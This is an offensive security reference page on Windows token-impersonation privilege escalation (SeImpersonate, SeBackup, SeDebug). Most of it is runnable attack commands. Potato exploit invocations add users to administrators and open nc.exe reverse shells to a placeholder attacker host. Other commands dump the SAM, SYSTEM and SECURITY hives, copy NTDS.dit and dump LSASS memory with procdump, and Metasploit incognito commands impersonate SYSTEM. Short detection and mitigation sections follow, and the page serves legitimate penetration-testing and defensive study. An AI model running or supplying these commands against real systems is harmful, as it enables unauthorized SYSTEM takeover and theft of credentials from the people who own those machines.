Token Impersonation

Overview

Windows uses access tokens to track security context for processes and threads. When a service account (e.g., IIS, MSSQL, or a web application service) has SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege, it can impersonate any token it obtains — including SYSTEM tokens. The "Potato" family of exploits abuses Windows COM/RPC mechanisms to coerce SYSTEM to authenticate to the attacker's controlled listener, then captures and impersonates the resulting token.

ATT&CK Mapping

• Tactic: TA0004 - Privilege Escalation
• Technique: T1134.001 - Access Token Manipulation: Token Impersonation/Theft

Prerequisites

• Shell access as a user with SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege
• Common service accounts with these privileges: IIS APPPOOL, NT Service\MSSQL, LOCAL SERVICE, NETWORK SERVICE
• Check with: whoami /priv

Techniques

Identifying Token Privileges

:: Check current token privileges
whoami /priv

:: Key privileges for impersonation:
:: SeImpersonatePrivilege       — Impersonate a client after authentication
:: SeAssignPrimaryTokenPrivilege — Replace a process level token

If either privilege is listed (even if "Disabled"), it can be used — "Disabled" means not currently active but can be enabled programmatically.

Potato Exploits

The Potato family forces SYSTEM to authenticate to a local listener, captures the token, and impersonates it. Different variants target different Windows versions and COM/RPC mechanisms.

JuicyPotato (Windows Server 2008-2016, Windows 7-10 before 1809):

:: JuicyPotato
:: https://github.com/ohpe/juicy-potato
JuicyPotato.exe -l 1337 -p cmd.exe -a "/c whoami" -t *

:: With specific CLSID (some CLSIDs work better on specific OS versions)
JuicyPotato.exe -l 1337 -p cmd.exe -a "/c net localgroup administrators <user> /add" -t * -c {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}

:: Execute a reverse shell
JuicyPotato.exe -l 1337 -p cmd.exe -a "/c C:\Users\Public\nc.exe <attacker> 4444 -e cmd.exe" -t *

PrintSpoofer (Windows 10 1809+, Server 2019+):

:: PrintSpoofer
:: https://github.com/itm4n/PrintSpoofer
:: Interactive SYSTEM shell
PrintSpoofer.exe -i -c cmd.exe

:: Execute a command as SYSTEM
PrintSpoofer.exe -c "cmd /c whoami"

:: Reverse shell
PrintSpoofer.exe -c "cmd /c C:\Users\Public\nc.exe <attacker> 4444 -e cmd.exe"

GodPotato (Windows 8-11, Server 2012-2022):

:: GodPotato
:: https://github.com/BeichenDream/GodPotato
GodPotato.exe -cmd "cmd /c whoami"
GodPotato.exe -cmd "cmd /c net localgroup administrators <user> /add"

SweetPotato (multiple techniques combined):

:: SweetPotato
:: https://github.com/CCob/SweetPotato
SweetPotato.exe -p cmd.exe -a "/c whoami"

SeBackupPrivilege

Allows reading any file on the system, regardless of ACLs:

:: Copy SAM and SYSTEM hives for offline credential extraction
reg save HKLM\SAM C:\Users\Public\sam.bak
reg save HKLM\SYSTEM C:\Users\Public\system.bak
reg save HKLM\SECURITY C:\Users\Public\security.bak

:: Extract hashes on attacker machine
:: impacket-secretsdump -sam sam.bak -system system.bak -security security.bak LOCAL

# Copy NTDS.dit (on a Domain Controller)
# Requires SeBackupPrivilege

# Enable the privilege
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Set-SeBackupPrivilege

# Copy NTDS.dit using robocopy (backup mode)
robocopy /b C:\Windows\NTDS C:\Users\Public ntds.dit

SeDebugPrivilege

Allows debugging any process — can be used to inject code into SYSTEM processes or dump LSASS:

:: Dump LSASS process memory for credential extraction
:: Requires SeDebugPrivilege
:: Task Manager > Details > lsass.exe > Create dump file

:: Or use procdump (Sysinternals)
procdump.exe -accepteula -ma lsass.exe lsass.dmp

Metasploit Token Impersonation

# From a Meterpreter session
# Metasploit Framework
# https://github.com/rapid7/metasploit-framework

# List available tokens
load incognito
list_tokens -u

# Impersonate a token
impersonate_token "NT AUTHORITY\\SYSTEM"
impersonate_token "DOMAIN\\Admin"

# Drop back to original token
rev2self

Detection Methods

Network-Based Detection

• Named pipe connections to unusual endpoints (Potato exploit indicators)
• DCOM/RPC traffic patterns associated with Potato exploits

Host-Based Detection

• Monitor for token impersonation API calls (Event ID 4688 with token elevation type)
• Alert on known Potato binary names or hashes
• Monitor for processes spawned as SYSTEM from service account parent processes
• LSASS memory access events (Sysmon Event ID 10)

Mitigation Strategies

• Remove unnecessary privileges — remove SeImpersonatePrivilege from service accounts that don't need it
• Use Group Managed Service Accounts (gMSA) — limited privileges by default
• Patch Windows — newer versions mitigate older Potato variants
• Credential Guard — protects LSASS from memory dumps
• Monitor privilege usage — audit token manipulation events

References

Official Documentation

• JuicyPotato
• PrintSpoofer
• GodPotato
• SweetPotato

Pentest Guides & Research

• itm4n - PrintSpoofer: Abusing Impersonation Privileges on Windows 10 and Server 2019
• PayloadsAllTheThings - Windows Privilege Escalation

MITRE ATT&CK

• T1134.001 - Access Token Manipulation: Token Impersonation/Theft